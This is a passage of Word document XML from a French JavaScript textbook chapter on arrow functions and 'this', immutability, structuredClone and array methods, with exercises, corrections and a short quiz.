        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et fonctions fléchées</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> désigne le contexte d'appel. Dans une méthode d'objet, c'est l'objet. Dans une fonction fléchée, c'est le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> du contexte englobant — ce qui explique pourquoi une flèche ne convient pas comme méthode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux contextes, deux comportements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const compteur = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  valeur: 0,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  incrementer() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.valeur += 1;          // this = compteur</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  // incrementerFleche: () =&gt; { this.valeur += 1 }, // this = contexte externe</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:br/>
        <w:t>const bouton = document.querySelector("button");</w:t>
        <w:br/>
        <w:t>bouton.addEventListener("click", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  this;   // dans une flèche, `this` n'est pas le bouton</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dans la pratique moderne, les flèches servent aux callbacks et les méthodes aux objets. Confondre les deux produit des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> difficiles à diagnostiquer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>25.5 Immutabilité et effets de bord</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une fonction qui modifie son argument surprend celui qui l'appelle. Préférez les fonctions qui renvoient une nouvelle valeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux styles, deux conséquences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Mutation : l'appelant est surpris</w:t>
        <w:br/>
        <w:t>function ajouterTag(tags, tag) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tags.push(tag);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return tags;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Sans mutation</w:t>
        <w:br/>
        <w:t>function avecTag(tags, tag) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return [...tags, tag];</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>const base = ["css"];</w:t>
        <w:br/>
        <w:t>const enrichi = avecTag(base, "html");</w:t>
        <w:br/>
        <w:t>base;      // ["css"]</w:t>
        <w:br/>
        <w:t>enrichi;   // ["css", "html"]</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>COPIE SUPERFICIELLE N'EST PAS COPIE PROFONDE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{ ...objet }</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> copie le premier niveau. Les objets imbriqués restent partagés : modifier </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>copie.auteur.nom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> modifie aussi l'original. Pour une copie profonde, utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>structuredClone(objet)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une copie réellement indépendante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const original = { a: { b: 1 } };</w:t>
        <w:br/>
        <w:t>const copie = structuredClone(original);</w:t>
        <w:br/>
        <w:t>copie.a.b = 2;</w:t>
        <w:br/>
        <w:t>original.a.b;   // 1</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TROIS QUESTIONS AVANT D'ÉCRIRE UNE BOUCLE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Puis-je exprimer l'intention avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>map</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>filter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>reduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">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Ma fonction modifie-t-elle son argument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Ai-je besoin de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans ce callback ?</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Déclaration, expression et flèche n'ont pas le même comportement.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paramètres par défaut clarifient les signatures.</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map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>reduce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplacent la plupart des boucles.</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sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mute le tableau ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>toSorted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non.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déstructuration extrait plusieurs valeurs en une ligne.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Une fonction fléchée ne possède pas son propre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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structuredClone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réalise une copie profonde.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les données se transforment. Il reste à les afficher : le chapitre suivant manipule le DOM.</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25.1 — Transformer une liste d'élèves</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 xml:space="preserve">À partir d'un tableau d'objets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{nom, notes: []}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, calculez la moyenne de chacun et triez par moyenne décroissante.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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>toSorted</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Ajoutez une mention selon la moyenne.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Formatez le résultat en tableau HTML (sans le construire encore).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 25.2 — Corriger une mutation involontaire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Cette fonction modifie la configuration globale.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>function activer(config) { config.actif = true; return config; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const config = { actif: false, options: { theme: "clair" } }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 25.3 — Refactoriser une boucle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   REFACTORISATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Remplacez cette boucle par des méthodes de tableau.</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const noms = []; for (const u of users) { if (u.actif) noms.push(u.nom) }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>let total = 0; for (const c of commandes) { total += c.prix }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const premier = users[0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> après un tri</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25.1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const eleves = [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Ada", notes: [16, 18, 15] },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Grace", notes: [12, 14, 11] },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Linus", notes: [9, 11, 13] },</w:t>
        <w:br/>
        <w:t>];</w:t>
        <w:br/>
        <w:br/>
        <w:t>const resultats = eleves</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .map(({ nom, notes }) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const moyenne = notes.reduce((a, b) =&gt; a + b, 0) / notes.length;</w:t>
        <w:br/>
        <w:t>const mention = moyenne &gt;= 16 ? "Très bien" : moyenne &gt;= 14 ? "Bien" :</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Passable";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return { nom, moyenne: Math.round(moyenne * 10) / 10, mention };</w:t>
        <w:br/>
        <w:t xml:space="preserve">  })</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .toSorted((a, b) =&gt; b.moyenne - a.moyenne);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>toSorted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite de modifier le tableau d'origine, ce qui rend la fonction prévisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'arrondi à une décimale évite les valeurs du type 14,666666 dans l'affichage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 25.2</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function activer(config) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return { ...config, actif: true };</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>const config = { actif: false, options: { theme: "clair" } };</w:t>
        <w:br/>
        <w:t>const nouvelle = activer(config);</w:t>
        <w:br/>
        <w:t>// config.actif === false</w:t>
        <w:br/>
        <w:t>// nouvelle.actif === true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La copie superficielle suffit ici car </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est une valeur primitive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Si l'on modifiait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>options.theme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, il faudrait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>structuredClone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou une copie explicite du sous-objet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 25.3</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const noms = users.filter(u =&gt; u.actif).map(u =&gt; u.nom);</w:t>
        <w:br/>
        <w:t>const total = commandes.reduce((somme, c) =&gt; somme + c.prix, 0);</w:t>
        <w:br/>
        <w:t>const premier = users.toSorted((a, b) =&gt; a.nom.localeCompare(b.nom))[0];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque méthode exprime une intention : filtrer, agréger, trier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localeCompare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trie correctement les accents, contrairement à une comparaison </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui dépend des codes de caractères.</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Quelle méthode transforme chaque élément d'un tableau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filter</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map</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reduce</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find</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Quelle méthode agrège un tableau en une seule valeur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map</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filter</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reduce</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some</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 xml:space="preserve">Que vaut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans une fonction fléchée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L'objet appelant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 xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> du contexte englobant</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window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> toujours</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undefined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> toujours</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Quelle méthode trie sans modifier le tableau d'origine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sort</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toSorted</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reverse</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splice</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>structuredClone</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Une copie superficielle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Une copie profonde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Une sérialisation JSON</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Un tri</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie un nouveau tableau de même longueur après transformation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
